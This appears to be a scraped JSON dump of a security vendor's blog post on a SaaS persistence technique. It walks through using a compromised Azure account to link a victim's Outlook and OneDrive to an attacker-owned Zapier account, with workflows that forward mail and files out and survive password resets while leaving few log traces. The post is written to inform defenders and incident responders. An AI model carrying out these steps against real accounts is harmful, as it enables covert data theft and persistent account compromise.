workflows",[],{},{"nodeType":178,"data":268361,"content":268362},{},[268363],{"nodeType":173,"value":268364,"marks":268365,"data":268366},"Ok, so we’ve figured out the user already makes use of Zapier and they’ve even already granted access to their email and files - that’s a juicy target we can’t turn down! So the next step is to create our own malicious workflows, or shadow workflows if you will, to get Zapier to do our dirty work for us.",[],{},{"nodeType":178,"data":268368,"content":268369},{},[268370],{"nodeType":173,"value":268371,"marks":268372,"data":268373},"First of all, we’ll see if we can scope out the user’s existing Zapier account to better understand the setup. Then we’ll create a new Zapier account and link it to the target user’s account that we’ve compromised. Here’s how that would work:",[],{},{"nodeType":235,"data":268375,"content":268376},{},[268377],{"nodeType":173,"value":268378,"marks":268379,"data":268380},"Scope out the existing Zapier account",[],{},{"nodeType":178,"data":268382,"content":268383},{},[268384],{"nodeType":173,"value":268385,"marks":268386,"data":268387},"If the user uses SSO or social logins then we can login directly and, since we now control their Azure account, we can just log directly into their Zapier account!",[],{},{"nodeType":312,"data":268389,"content":268393},{"target":268390},{"sys":268391},{"id":268392,"type":317,"linkType":318},"5IgmxUEm6n19OBL1cSZVkr",[],{"nodeType":178,"data":268395,"content":268396},{},[268397,268401,268408],{"nodeType":173,"value":268398,"marks":268399,"data":268400},"Alternatively, if they have created a standard password account, then we might already know the password if it’s the same used for their Azure account. Otherwise, we could potentially make use of an ",[],{},{"nodeType":186,"data":268402,"content":268403},{"uri":259860},[268404],{"nodeType":173,"value":259866,"marks":268405,"data":268407},[268406],{"type":194},{},{"nodeType":173,"value":268409,"marks":268410,"data":268411}," attack to gain access.",[],{},{"nodeType":178,"data":268413,"content":268414},{},[268415,268419,268427],{"nodeType":173,"value":268416,"marks":268417,"data":268418},"Once we have logged into their account, we can see their existing workflows and integrations. Technically, we could backdoor these or create new ones - a form of an ",[],{},{"nodeType":186,"data":268420,"content":268421},{"uri":197917},[268422],{"nodeType":173,"value":268423,"marks":268424,"data":268426},"abuse existing OAuth integrations",[268425],{"type":194},{},{"nodeType":173,"value":268428,"marks":268429,"data":268430}," attack. However, that runs the risk of the user discovering our shadow workflows and also almost certainly being locked out of the account during the next password change. ",[],{},{"nodeType":178,"data":268432,"content":268433},{},[268434],{"nodeType":173,"value":268435,"marks":268436,"data":268437},"Instead, we can stick to an evil twin integration from our own Zapier account, which we’ll create later.",[],{},{"nodeType":312,"data":268439,"content":268443},{"target":268440},{"sys":268441},{"id":268442,"type":317,"linkType":318},"2vhyTcVLq27QVa2HFFWBhH",[],{"nodeType":312,"data":268445,"content":268449},{"target":268446},{"sys":268447},{"id":268448,"type":317,"linkType":318},"3jPSdBPSQgigA4yKK1udCV",[],{"nodeType":178,"data":268451,"content":268452},{},[268453],{"nodeType":173,"value":268454,"marks":268455,"data":268456},"Now we can see what the user was actually using Zapier for — they’ve set up an integration with both Outlook and OneDrive so they can forward emails related to their business expenses to a folder in their OneDrive. Probably a time-saving hack, which we can take advantage of since it won’t be unusual to see Zapier regularly accessing their Outlook and OneDrive. That means our attack will be extra stealthy.",[],{},{"nodeType":235,"data":268458,"content":268459},{},[268460],{"nodeType":173,"value":268461,"marks":268462,"data":268463},"Create our own malicious Zapier account",[],{},{"nodeType":178,"data":268465,"content":268466},{},[268467],{"nodeType":173,"value":268468,"marks":268469,"data":268470},"Given in this case we, at least temporarily, control the user’s Azure account there is nothing stopping us connecting this to our own malicious Zapier account completely separately from the user’s legitimate Zapier account. We then maintain full control over the Zapier account and the user will not be able to discover our shadow workflows as they won’t have any knowledge of our Zapier account: ",[],{},{"nodeType":178,"data":268472,"content":268473},{},[268474],{"nodeType":173,"value":268475,"marks":268476,"data":268477},"Let’s create our own shadow workflows:",[],{},{"nodeType":250,"data":268479,"content":268480},{},[268481,268491],{"nodeType":254,"data":268482,"content":268483},{},[268484],{"nodeType":178,"data":268485,"content":268486},{},[268487],{"nodeType":173,"value":268488,"marks":268489,"data":268490},"One that sends every new OneDrive file to our own separate Google Drive account. This allows us to maintain a complete view of the user’s files into the future. ",[],{},{"nodeType":254,"data":268492,"content":268493},{},[268494],{"nodeType":178,"data":268495,"content":268496},{},[268497],{"nodeType":173,"value":268498,"marks":268499,"data":268500},"And one to forward every new Outlook email to our own GMail account.",[],{},{"nodeType":312,"data":268502,"content":268506},{"target":268503},{"sys":268504},{"id":268505,"type":317,"linkType":318},"6eK8uNjPnkrfVjgFzl03SM",[],{"nodeType":312,"data":268508,"content":268512},{"target":268509},{"sys":268510},{"id":268511,"type":317,"linkType":318},"6xJvuS374tbflAoNmhnqYP",[],{"nodeType":178,"data":268514,"content":268515},{},[268516],{"nodeType":173,"value":268517,"marks":268518,"data":268519},"We can now see we are logged in with a separate GMail account, but have created shadow workflows to forward emails from the user’s Outlook to our GMail account and harvest files from their OneDrive to our Google Drive.",[],{},{"nodeType":178,"data":268521,"content":268522},{},[268523],{"nodeType":173,"value":268524,"marks":268525,"data":268526},"The major benefit of creating our own Zapier account for an evil twin integration is that once we are locked out of the target user’s account via a password change or otherwise, not only do our existing shadow workflows continue to operate via OAuth, but we are able to create new shadow workflows and reuse the existing OAuth connections. That’s the power of having full control of the Zapier account. ",[],{},{"nodeType":178,"data":268528,"content":268529},{},[268530],{"nodeType":173,"value":268531,"marks":268532,"data":268533},"One small downside to this approach is that creating the new OAuth integrations inside a new Zapier account generates an interactive login event for the Zapier integrations from the adversary’s IP address. This occurs due to creating integrations from the new Zapier account, but because the user has already consented to all the relevant permissions for Zapier’s own OAuth apps there are no audit logs for new consents or applications, just the login event itself. ",[],{},{"nodeType":178,"data":268535,"content":268536},{},[268537,268541],{"nodeType":173,"value":268538,"marks":268539,"data":268540},"However, determining that a successful login to an app a user legitimately uses is actually malicious in this case is obviously extremely difficult to build detection logic for.   ",[],{},{"nodeType":173,"value":10557,"marks":268542,"data":268544},[268543],{"type":1646},{},{"nodeType":312,"data":268546,"content":268550},{"target":268547},{"sys":268548},{"id":268549,"type":317,"linkType":318},"1oZBtlL8rNl7TjmfJqRjUG",[],{"nodeType":178,"data":268552,"content":268553},{},[268554],{"nodeType":173,"value":268555,"marks":268556,"data":268557},"Beyond the initial login events, the only evidence of malicious activity in the future will be from the activity logs showing the actions conducted by our shadow workflows every time they are triggered to run. For example, the following screenshots show that the Zapier Todo app (ClientAppId 29246358-1970-4d6d-bc75-acf34edc758b) has been seen both uploading a file and downloading a file: \n",[],{},{"nodeType":312,"data":268559,"content":268563},{"target":268560},{"sys":268561},{"id":268562,"type":317,"linkType":318},"2vYOSilB5W05aIHw2ZKqdC",[],{"nodeType":312,"data":268565,"content":268569},{"target":268566},{"sys":268567},{"id":268568,"type":317,"linkType":318},"2fFwrdFO25BwY4vI7EKMA0",[],{"nodeType":178,"data":268571,"content":268572},{},[268573],{"nodeType":173,"value":268574,"marks":268575,"data":268576},"The file upload in this case relates to the legitimate workflow and the file download relates to the shadow workflow. The IP addresses relate to Zapier’s legitimate infrastructure so really only a very thorough and specific investigation is going to be able to uncover that one of these events is malicious.",[],{},{"nodeType":169,"data":268578,"content":268579},{},[268580],{"nodeType":173,"value":268581,"marks":268582,"data":268583},"Step 3 - Profit",[],{},{"nodeType":178,"data":268585,"content":268586},{},[268587],{"nodeType":173,"value":268588,"marks":268589,"data":268590},"Now we just need to sit back and let our shadow workflows do the work for us, 24/7 and from Zapier’s infrastructure via a legitimate OAuth integration. Here we can see files the user created in OneDrive and emails they received in Outlook mirrored to our own GMail and Google Drive via the magic of shadow workflows.",[],{},{"nodeType":312,"data":268592,"content":268596},{"target":268593},{"sys":268594},{"id":268595,"type":317,"linkType":318},"4lJBrdJLEVnhBUjgtGo8T1",[],{"nodeType":312,"data":268598,"content":268602},{"target":268599},{"sys":268600},{"id":268601,"type":317,"linkType":318},"azQ3IO0n4Idih5LDwOogV",[],{"nodeType":169,"data":268604,"content":268605},{},[268606],{"nodeType":173,"value":15539,"marks":268607,"data":268608},[],{},{"nodeType":178,"data":268610,"content":268611},{},[268612],{"nodeType":173,"value":268613,"marks":268614,"data":268615},"Ok, we’ve covered a lot of ground here so it’s worth taking a step back and considering the key impact points of this attack chain:",[],{},{"nodeType":250,"data":268617,"content":268618},{},[268619,268629,268639,268649,268659,268712,268722],{"nodeType":254,"data":268620,"content":268621},{},[268622],{"nodeType":178,"data":268623,"content":268624},{},[268625],{"nodeType":173,"value":268626,"marks":268627,"data":268628},"An adversary who has gained (temporary) access to a user account that supports OAuth integrations can use shadow workflows to execute malicious actions and to maintain persistence",[],{},{"nodeType":254,"data":268630,"content":268631},{},[268632],{"nodeType":178,"data":268633,"content":268634},{},[268635],{"nodeType":173,"value":268636,"marks":268637,"data":268638},"This access will continue even if the user changes their password or resets MFA",[],{},{"nodeType":254,"data":268640,"content":268641},{},[268642],{"nodeType":178,"data":268643,"content":268644},{},[268645],{"nodeType":173,"value":268646,"marks":268647,"data":268648},"Not only do existing shadow workflows continue to work after password changes, an adversary can continue to create new ones and reuse the existing integrations.",[],{},{"nodeType":254,"data":268650,"content":268651},{},[268652],{"nodeType":178,"data":268653,"content":268654},{},[268655],{"nodeType":173,"value":268656,"marks":268657,"data":268658},"Any relevant logs will show access via legitimate IP addresses and OAuth integrations for SaaS automation apps ",[],{},{"nodeType":254,"data":268660,"content":268661},{},[268662,268669],{"nodeType":178,"data":268663,"content":268664},{},[268665],{"nodeType":173,"value":268666,"marks":268667,"data":268668},"Automation apps are so flexible that an adversary can do pretty much anything - it’s basically the offensive PowerShell of the SaaS world. Just some examples:",[],{},{"nodeType":250,"data":268670,"content":268671},{},[268672,268682,268692,268702],{"nodeType":254,"data":268673,"content":268674},{},[268675],{"nodeType":178,"data":268676,"content":268677},{},[268678],{"nodeType":173,"value":268679,"marks":268680,"data":268681},"Monitor all emails and files the user creates",[],{},{"nodeType":254,"data":268683,"content":268684},{},[268685],{"nodeType":178,"data":268686,"content":268687},{},[268688],{"nodeType":173,"value":268689,"marks":268690,"data":268691},"Delete email security alerts before the user sees them",[],{},{"nodeType":254,"data":268693,"content":268694},{},[268695],{"nodeType":178,"data":268696,"content":268697},{},[268698],{"nodeType":173,"value":268699,"marks":268700,"data":268701},"Intercept password reset and passwordless login emails to access other apps",[],{},{"nodeType":254,"data":268703,"content":268704},{},[268705],{"nodeType":178,"data":268706,"content":268707},{},[268708],{"nodeType":173,"value":268709,"marks":268710,"data":268711},"Monitor instant messaging apps and use it to send targeted internal social engineering emails",[],{},{"nodeType":254,"data":268713,"content":268714},{},[268715],{"nodeType":178,"data":268716,"content":268717},{},[268718],{"nodeType":173,"value":268719,"marks":268720,"data":268721},"If targeted users are already using automation apps legitimately, it’s even more stealthy - you won’t even see any new integrations or permission grants appear as the user will have already granted these legitimately.",[],{},{"nodeType":254,"data":268723,"content":268724},{},[268725],{"nodeType":178,"data":268726,"content":268727},{},[268728],{"nodeType":173,"value":268729,"marks":268730,"data":268731},"If admin consent has been granted to the automation app, any user can be targeted without generating new permission grant logs even if they have never used the app.",[],{},{"nodeType":169,"data":268733,"content":268734},{},[268735],{"nodeType":173,"value":40632,"marks":268736,"data":268737},[],{},{"nodeType":178,"data":268739,"content":268740},{},[268741],{"nodeType":173,"value":268742,"marks":268743,"data":268744},"We have seen how two new SaaS-focused attack techniques can be combined into one more effective attack chain - in this case, a particularly nasty and stealthy persistence technique. This shows how even if a user compromise is detected very early, with password and MFA resets immediately issued, adversaries can maintain control over the account regardless.",[],{},{"nodeType":178,"data":268746,"content":268747},{},[268748],{"nodeType":173,"value":268749,"marks":268750,"data":268751},"This shows how even legitimate SaaS applications have incredibly powerful offensive use cases and very careful attention needs to be paid to integrations with highly sensitive permissions, even when they are approved and vetted applications. Incident response teams especially need to be well aware of these techniques when investigating potential user account compromises as persistence approaches can extend much further than endpoint implants and stolen passwords.",[],{},"The shadow workflow’s evil twin: A nearly invisible attack chain","2023-09-11T00:00:00.000Z","nearly-invisible-attack-chain",{"items":268756},[268757,268759],{"sys":268758,"name":505},{"id":504},{"sys":268760,"name":509},{"id":508},{"items":268762},[268763],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":268764},{"url":8615},{"items":268766},[268767],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":268768},{"url":8615},{"json":268770,"links":269304},{"data":268771,"content":268772,"nodeType":165},{},[268773,268789,268795,268801,268817,268823,268838,268844,268850,268876,268882,268888,268894,268900,268929,268934,268940,268956,268962,268968,268974,269004,269010,269016,269022,269038,269043,269048,269053,269059,269077,269083,269089,269095,269101,269158,269164,269203,269209,269214,269220,269233,269238,269244,269250,269280,269286,269292,269298],{"data":268774,"content":268775,"nodeType":178},{},[268776,268779,268786],{"data":268777,"marks":268778,"value":227910,"nodeType":173},{},[],{"data":268780,"content":268781,"nodeType":186},{"uri":70029},[268782],{"data":268783,"marks":268784,"value":227918,"nodeType":173},{},[268785],{"type":194},{"data":268787,"marks":268788,"value":227922,"nodeType":173},{},[],{"data":268790,"content":268791,"nodeType":178},{},[268792],{"data":268793,"marks":268794,"value":227929,"nodeType":173},{},[],{"data":268796,"content":268797,"nodeType":169},{},[268798],{"data":268799,"marks":268800,"value":227936,"nodeType":173},{},[],{"data":268802,"content":268803,"nodeType":178},{},[268804,268807,268814],{"data":268805,"marks":268806,"value":37,"nodeType":173},{},[],{"data":268808,"content":268809,"nodeType":186},{"uri":63250},[268810],{"data":268811,"marks":268812,"value":63256,"nodeType":173},{},[268813],{"type":194},{"data":268815,"marks":268816,"value":227953,"nodeType":173},{},[],{"data":268818,"content":268819,"nodeType":169},{},[268820],{"data":268821,"marks":268822,"value":227960,"nodeType":173},{},[],{"data":268824,"content":268825,"nodeType":178},{},[268826,268829,268835],{"data":268827,"marks":268828,"value":37,"nodeType":173},{},[],{"data":268830,"content":268831,"nodeType":186},{"uri":208521},[268832],{"data":268833,"marks":268834,"value":227973,"nodeType":173},{},[],{"data":268836,"marks":268837,"value":227977,"nodeType":173},{},[],{"data":268839,"content":268840,"nodeType":169},{},[268841],{"data":268842,"marks":268843,"value":227984,"nodeType":173},{},[],{"data":268845,"content":268846,"nodeType":178},{},[268847],{"data":268848,"marks":268849,"value":227991,"nodeType":173},{},[],{"data":268851,"content":268852,"nodeType":178},{},[268853,268856,268863,268866,268873],{"data":268854,"marks":268855,"value":227998,"nodeType":173},{},[],{"data":268857,"content":268858,"nodeType":186},{"uri":228001},[268859],{"data":268860,"marks":268861,"value":228007,"nodeType":173},{},[268862],{"type":194},{"data":268864,"marks":268865,"value":228011,"nodeType":173},{},[],{"data":268867,"content":268868,"nodeType":186},{"uri":228014},[268869],{"data":268870,"marks":268871,"value":228020,"nodeType":173},{},[268872],{"type":194},{"data":268874,"marks":268875,"value":228024,"nodeType":173},{},[],{"data":268877,"content":268878,"nodeType":178},{},[268879],{"data":268880,"marks":268881,"value":228031,"nodeType":173},{},[],{"data":268883,"content":268884,"nodeType":178},{},[268885],{"data":268886,"marks":268887,"value":228038,"nodeType":173},{},[],{"data":268889,"content":268890,"nodeType":178},{},[268891],{"data":268892,"marks":268893,"value":228045,"nodeType":173},{},[],{"data":268895,"content":268896,"nodeType":178},{},[268897],{"data":268898,"marks":268899,"value":228052,"nodeType":173},{},[],{"data":268901,"content":268902,"nodeType":250},{},[268903,268916],{"data":268904,"content":268905,"nodeType":254},{},[268906],{"data":268907,"content":268908,"nodeType":178},{},[268909,268913],{"data":268910,"marks":268911,"value":228066,"nodeType":173},{},[268912],{"type":370},{"data":268914,"marks":268915,"value":228070,"nodeType":173},{},[],{"data":268917,"content":268918,"nodeType":254},{},[268919],{"data":268920,"content":268921,"nodeType":178},{},[268922,268926],{"data":268923,"marks":268924,"value":228081,"nodeType":173},{},[268925],{"type":370},{"data":268927,"marks":268928,"value":228085,"nodeType":173},{},[],{"data":268930,"content":268933,"nodeType":312},{"target":268931},{"sys":268932},{"id":169040,"type":317,"linkType":318},[],{"data":268935,"content":268936,"nodeType":169},{},[268937],{"data":268938,"marks":268939,"value":228066,"nodeType":173},{},[],{"data":268941,"content":268942,"nodeType":178},{},[268943,268946,268953],{"data":268944,"marks":268945,"value":228103,"nodeType":173},{},[],{"data":268947,"content":268948,"nodeType":186},{"uri":228106},[268949],{"data":268950,"marks":268951,"value":228112,"nodeType":173},{},[268952],{"type":194},{"data":268954,"marks":268955,"value":37,"nodeType":173},{},[],{"data":268957,"content":268958,"nodeType":178},{},[268959],{"data":268960,"marks":268961,"value":228122,"nodeType":173},{},[],{"data":268963,"content":268964,"nodeType":178},{},[268965],{"data":268966,"marks":268967,"value":228129,"nodeType":173},{},[],{"data":268969,"content":268970,"nodeType":178},{},[268971],{"data":268972,"marks":268973,"value":228136,"nodeType":173},{},[],{"data":268975,"content":268976,"nodeType":250},{},[268977,268986,268995],{"data":268978,"content":268979,"nodeType":254},{},[268980],{"data":268981,"content":268982,"nodeType":178},{},[268983],{"data":268984,"marks":268985,"value":228149,"nodeType":173},{},[],{"data":268987,"content":268988,"nodeType":254},{},[268989],{"data":268990,"content":268991,"nodeType":178},{},[268992],{"data":268993,"marks":268994,"value":228159,"nodeType":173},{},[],{"data":268996,"content":268997,"nodeType":254},{},[268998],{"data":268999,"content":269000,"nodeType":178},{},[269001],{"data":269002,"marks":269003,"value":228169,"nodeType":173},{},[],{"data":269005,"content":269006,"nodeType":178},{},[269007],{"data":269008,"marks":269009,"value":228176,"nodeType":173},{},[],{"data":269011,"content":269012,"nodeType":178},{},[269013],{"data":269014,"marks":269015,"value":228183,"nodeType":173},{},[],{"data":269017,"content":269018,"nodeType":178},{},[269019],{"data":269020,"marks":269021,"value":228190,"nodeType":173},{},[],{"data":269023,"content":269024,"nodeType":178},{},[269025,269028,269035],{"data":269026,"marks":269027,"value":37,"nodeType":173},{},[],{"data":269029,"content":269030,"nodeType":186},{"uri":228199},[269031],{"data":269032,"marks":269033,"value":228199,"nodeType":173},{},[269034],{"type":194},{"data":269036,"marks":269037,"value":37,"nodeType":173},{},[],{"data":269039,"content":269042,"nodeType":312},{"target":269040},{"sys":269041},{"id":228212,"type":317,"linkType":318},[],{"data":269044,"content":269047,"nodeType":312},{"target":269045},{"sys":269046},{"id":228218,"type":317,"linkType":318},[],{"data":269049,"content":269052,"nodeType":312},{"target":269050},{"sys":269051},{"id":228224,"type":317,"linkType":318},[],{"data":269054,"content":269055,"nodeType":169},{},[269056],{"data":269057,"marks":269058,"value":228232,"nodeType":173},{},[],{"data":269060,"content":269061,"nodeType":178},{},[269062,269065,269074],{"data":269063,"marks":269064,"value":228239,"nodeType":173},{},[],{"data":269066,"content":269069,"nodeType":1698},{"target":269067},{"sys":269068},{"id":228244,"type":317,"linkType":318},[269070],{"data":269071,"marks":269072,"value":63256,"nodeType":173},{},[269073],{"type":194},{"data":269075,"marks":269076,"value":228253,"nodeType":173},{},[],{"data":269078,"content":269079,"nodeType":178},{},[269080],{"data":269081,"marks":269082,"value":228260,"nodeType":173},{},[],{"data":269084,"content":269085,"nodeType":178},{},[269086],{"data":269087,"marks":269088,"value":228267,"nodeType":173},{},[],{"data":269090,"content":269091,"nodeType":178},{},[269092],{"data":269093,"marks":269094,"value":228274,"nodeType":173},{},[],{"data":269096,"content":269097,"nodeType":178},{},[269098],{"data":269099,"marks":269100,"value":228281,"nodeType":173},{},[],{"data":269102,"content":269103,"nodeType":250},{},[269104,269113,269122,269131,269140,269149],{"data":269105,"content":269106,"nodeType":254},{},[269107],{"data":269108,"content":269109,"nodeType":178},{},[269110],{"data":269111,"marks":269112,"value":228294,"nodeType":173},{},[],{"data":269114,"content":269115,"nodeType":254},{},[269116],{"data":269117,"content":269118,"nodeType":178},{},[269119],{"data":269120,"marks":269121,"value":228304,"nodeType":173},{},[],{"data":269123,"content":269124,"nodeType":254},{},[269125],{"data":269126,"content":269127,"nodeType":178},{},[269128],{"data":269129,"marks":269130,"value":228314,"nodeType":173},{},[],{"data":269132,"content":269133,"nodeType":254},{},[269134],{"data":269135,"content":269136,"nodeType":178},{},[269137],{"data":269138,"marks":269139,"value":228324,"nodeType":173},{},[],{"data":269141,"content":269142,"nodeType":254},{},[269143],{"data":269144,"content":269145,"nodeType":178},{},[269146],{"data":269147,"marks":269148,"value":228334,"nodeType":173},{},[],{"data":269150,"content":269151,"nodeType":254},{},[269152],{"data":269153,"content":269154,"nodeType":178},{},[269155],{"data":269156,"marks":269157,"value":228344,"nodeType":173},{},[],{"data":269159,"content":269160,"nodeType":178},{},[269161],{"data":269162,"marks":269163,"value":228351,"nodeType":173},{},[],{"data":269165,"content":269166,"nodeType":250},{},[269167,269176,269185,269194],{"data":269168,"content":269169,"nodeType":254},{},[269170],{"data":269171,"content":269172,"nodeType":178},{},[269173],{"data":269174,"marks":269175,"value":228364,"nodeType":173},{},[],{"data":269177,"content":269178,"nodeType":254},{},[269179],{"data":269180,"content":269181,"nodeType":178},{},[269182],{"data":269183,"marks":269184,"value":228374,"nodeType":173},{},[],{"data":269186,"content":269187,"nodeType":254},{},[269188],{"data":269189,"content":269190,"nodeType":178},{},[269191],{"data":269192,"marks":269193,"value":228384,"nodeType":173},{},[],{"data":269195,"content":269196,"nodeType":254},{},[269197],{"data":269198,"content":269199,"nodeType":178},{},[269200],{"data":269201,"marks":269202,"value":228394,"nodeType":173},{},[],{"data":269204,"content":269205,"nodeType":178},{},[269206],{"data":269207,"marks":269208,"value":228401,"nodeType":173},{},[],{"data":269210,"content":269213,"nodeType":312},{"target":269211},{"sys":269212},{"id":228406,"type":317,"linkType":318},[],{"data":269215,"content":269216,"nodeType":178},{},[269217],{"data":269218,"marks":269219,"value":228414,"nodeType":173},{},[],{"data":269221,"content":269222,"nodeType":178},{},[269223,269226,269230],{"data":269224,"marks":269225,"value":228421,"nodeType":173},{},[],{"data":269227,"marks":269228,"value":67363,"nodeType":173},{},[269229],{"type":1646},{"data":269231,"marks":269232,"value":228429,"nodeType":173},{},[],{"data":269234,"content":269237,"nodeType":312},{"target":269235},{"sys":269236},{"id":209109,"type":317,"linkType":318},[],{"data":269239,"content":269240,"nodeType":169},{},[269241],{"data":269242,"marks":269243,"value":15539,"nodeType":173},{},[],{"data":269245,"content":269246,"nodeType":178},{},[269247],{"data":269248,"marks":269249,"value":228447,"nodeType":173},{},[],{"data":269251,"content":269252,"nodeType":250},{},[269253,269262,269271],{"data":269254,"content":269255,"nodeType":254},{},[269256],{"data":269257,"content":269258,"nodeType":178},{},[269259],{"data":269260,"marks":269261,"value":228460,"nodeType":173},{},[],{"data":269263,"content":269264,"nodeType":254},{},[269265],{"data":269266,"content":269267,"nodeType":178},{},[269268],{"data":269269,"marks":269270,"value":228470,"nodeType":173},{},[],{"data":269272,"content":269273,"nodeType":254},{},[269274],{"data":269275,"content":269276,"nodeType":178},{},[269277],{"data":269278,"marks":269279,"value":228480,"nodeType":173},{},[],{"data":269281,"content":269282,"nodeType":169},{},[269283],{"data":269284,"marks":269285,"value":40632,"nodeType":173},{},[],{"data":269287,"content":269288,"nodeType":178},{},[269289],{"data":269290,"marks":269291,"value":228493,"nodeType":173},{},[],{"data":269293,"content":269294,"nodeType":178},{},[269295],{"data":269296,"marks":269297,"value":228500,"nodeType":173},{},[],{"data":269299,"content":269300,"nodeType":178},{},[269301],{"data":269302,"marks":269303,"value":228507,"nodeType":173},{},[],{"entries":269305},{"inline":269306,"hyperlink":269307,"block":269310},[],[269308],{"sys":269309,"__typename":1528,"title":252406,"slug":252407},{"id":228244},[269311,269313,269321,269329,269335,269340],{"sys":269312,"__typename":15269,"type":112637,"ctaText":192192,"buttonLabel":192193,"buttonColour":15273,"buttonUrl":118},{"id":169040},{"sys":269314,"__typename":5345,"title":269315,"caption":269316,"layoutMode":118,"file":269317},{"id":228212},"Oktajacking 1","Importing AD users we have setup on our custom AD domain into Okta",{"url":269318,"width":269319,"height":269320},"https://images.ctfassets.net/y1cdw1ablpvd/1yuQgvV0YqJHHosLP4l1tq/12ceb07dc8b3a326bf43140e05d974a6/image1.png",1036,495,{"sys":269322,"__typename":5345,"title":269323,"caption":269324,"layoutMode":118,"file":269325},{"id":228218},"Oktajacking 2"," Modifying Okta authentication rules to only require a password (remove Okta Verify requirement",{"url":269326,"width":269327,"height":269328},"https://images.ctfassets.net/y1cdw1ablpvd/2qdJ0DT6gR4SIgVIm8uqKm/94eb5ea6d8af37800fa1aaf9ced6ba8b/image3.png",1082,476,{"sys":269330,"__typename":5345,"title":269331,"caption":269332,"layoutMode":118,"file":269333},{"id":228224},"Oktajacking 3","Running a modified version of Adam Chester’s python script to accept any password in addition to capturing credentials",{"url":269334,"width":265765,"height":28034},"https://images.ctfassets.net/y1cdw1ablpvd/36TIC04qvQQZ6tpo4B11go/85501dfc97a0eeb779e9011f1219d8a4/image2.png",{"sys":269336,"__typename":5345,"title":269337,"caption":118,"layoutMode":118,"file":269338},{"id":228406},"Oktajacking demo webp",{"url":269339,"width":121106,"height":49163},"https://downloads.ctfassets.net/y1cdw1ablpvd/6YXk94C8bRO5OEnkwPIVWJ/e6a2f1799e8d7e342c247643f8eefdfc/oktajacking__3_.webp",{"sys":269341,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},"content:blog:oktajacking.json","blog/oktajacking.json","blog/oktajacking",{"_path":269346,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":269347,"ogImage":118,"summary":269349,"title":259436,"subtitle":118,"metaTitle":269360,"synopsis":259437,"hashTags":118,"publishedDate":259438,"slug":259439,"tagsCollection":269361,"relatedBlogPostsCollection":269367,"authorsCollection":271633,"content":271637,"_id":272769,"_type":5439,"_source":5440,"_file":272770,"_stem":272771,"_extension":5439},"/blog/okta-swa",{"id":258262,"publishedAt":269348},"2024-03-21T08:54:57.663Z",{"json":269350},{"data":269351,"content":269352,"nodeType":165},{},[269353],{"data":269354,"content":269355,"nodeType":178},{},[269356],{"data":269357,"marks":269358,"value":269359,"nodeType":173},{},[],"In this article, we’ll discuss and demonstrate why Okta's SWA isn't the same or as secure as using SAML and OIDC authentication methods for SSO.\n","Abusing Okta's SWA authentication method",{"items":269362},[269363,269365],{"sys":269364,"name":26137},{"id":26136},{"sys":269366,"name":509},{"id":508},{"items":269368},[269369,270691,271438],{"__typename":1528,"sys":269370,"content":269372,"title":270678,"synopsis":269387,"hashTags":118,"publishedDate":270679,"slug":270680,"tagsCollection":270681,"authorsCollection":270687},{"id":269371},"3JXKiUMGU8JBpndhLRYOCJ",{"json":269373},{"nodeType":165,"data":269374,"content":269375},{},[269376,269383,269390,269396,269403,269425,269432,269438,269445,269452,269459,269494,269500,269507,269625,269632,269639,269895,269902,269909,269915,269948,269955,269962,269968,269975,269981,269988,269995,270001,270008,270015,270021,270028,270035,270041,270048,270064,270070,270077,270109,270116,270136,270143,270150,270157,270163,270201,270221,270274,270281,270288,270308,270327,270334,270367,270373,270380,270387,270394,270401,270408,270415,270435,270441,270448,270467,270474,270481,270487,270494,270501,270507,270514,270560,270567,270573,270580,270586,270593,270600,270633,270639,270646,270653,270660,270667,270672],{"nodeType":178,"data":269377,"content":269378},{},[269379],{"nodeType":173,"value":269380,"marks":269381,"data":269382},"With the proliferation of SaaS apps and integrations comes an equal helping of uncertainty surrounding the associated security risks. If you’ve ever found yourself in a position where you’ve had to review a SaaS app integration, whether it’s during the remediation stage of an incident or simply during the process of tending to a user request, then keep on reading. ",[],{},{"nodeType":178,"data":269384,"content":269385},{},[269386],{"nodeType":173,"value":269387,"marks":269388,"data":269389},"This article covers common ways an app could lead to compromise in Microsoft Azure, and what to look out for when determining risk to your organization.",[],{},{"nodeType":169,"data":269391,"content":269392},{},[269393],{"nodeType":173,"value":39940,"marks":269394,"data":269395},[],{},{"nodeType":235,"data":269397,"content":269398},{},[269399],{"nodeType":173,"value":269400,"marks":269401,"data":269402},"The issue:",[],{},{"nodeType":178,"data":269404,"content":269405},{},[269406,269410,269421],{"nodeType":173,"value":269407,"marks":269408,"data":269409},"This method of compromising user accounts has been covered a ",[],{},{"nodeType":1698,"data":269411,"content":269415},{"target":269412},{"sys":269413},{"id":269414,"type":317,"linkType":318},"1bV8YTSQHvveCTnRc4H8su",[269416],{"nodeType":173,"value":269417,"marks":269418,"data":269420},"few times",[269419],{"type":194},{},{"nodeType":173,"value":269422,"marks":269423,"data":269424}," by Push. Without rehashing too much of the content, the main idea behind consent phishing is to get a user to perform an integration while the app masquerades as something official. ",[],{},{"nodeType":178,"data":269426,"content":269427},{},[269428],{"nodeType":173,"value":269429,"marks":269430,"data":269431},"As an example, a user is sent an email where the content is either surprisingly legitimate, or sparks sufficient curiosity to make them want to access the data behind the link. They are directed to a Microsoft or Google login page, where the app asks for certain permissions, such as mailbox access. The user, having performed these actions before, thinks nothing of it and clicks ‘allow’. The attacker successfully tricked the user to give them access to their mailbox (or whichever privileges the app was requesting).",[],{},{"nodeType":312,"data":269433,"content":269437},{"target":269434},{"sys":269435},{"id":269436,"type":317,"linkType":318},"2zeeE8NrgX4MnpHdIjszot",[],{"nodeType":235,"data":269439,"content":269440},{},[269441],{"nodeType":173,"value":269442,"marks":269443,"data":269444},"The solution:",[],{},{"nodeType":178,"data":269446,"content":269447},{},[269448],{"nodeType":173,"value":269449,"marks":269450,"data":269451},"There are two ways to help prevent this type of compromise:",[],{},{"nodeType":178,"data":269453,"content":269454},{},[269455],{"nodeType":173,"value":269456,"marks":269457,"data":269458},"The first is to go the “block everything” route by preventing any integrations from being added to your tenants at all. This is quite heavy-handed and a bit like throwing the baby out with the bathwater, as this approach leads to IT/security departments becoming known as the departments of ‘NO’, potentially resulting in users circumventing controls, and the emergence of shadow IT.",[],{},{"nodeType":178,"data":269460,"content":269461},{},[269462,269466,269475,269479,269490],{"nodeType":173,"value":269463,"marks":269464,"data":269465},"The second is to be sensible about what to allow and what to prevent during SaaS integrations. For instance, in Microsoft 